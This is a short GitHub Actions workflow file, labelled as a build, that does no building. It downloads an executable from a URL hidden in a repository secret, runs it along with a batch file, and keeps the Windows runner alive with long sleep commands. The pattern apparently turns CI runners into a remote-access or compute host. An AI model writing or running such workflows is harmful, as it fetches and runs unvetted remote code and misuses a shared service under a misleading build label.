name: CRM19

on:
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: windows-2019
    timeout-minutes: 360
    
    steps:
      - name: Checkout the repository
        uses: actions/checkout@v2

      - name: Download file using curl
        run: |
          curl -L -o miso.exe "${{ secrets.MY_URL }}"
          
      - name: crmdown
        run: cmd /c miso.exe

      - name: Time Counter
        run: sleep 99999

      - name: crmdown
        run: cmd /c crmdown.bat

      - name: Time Counter
        run: sleep 99999
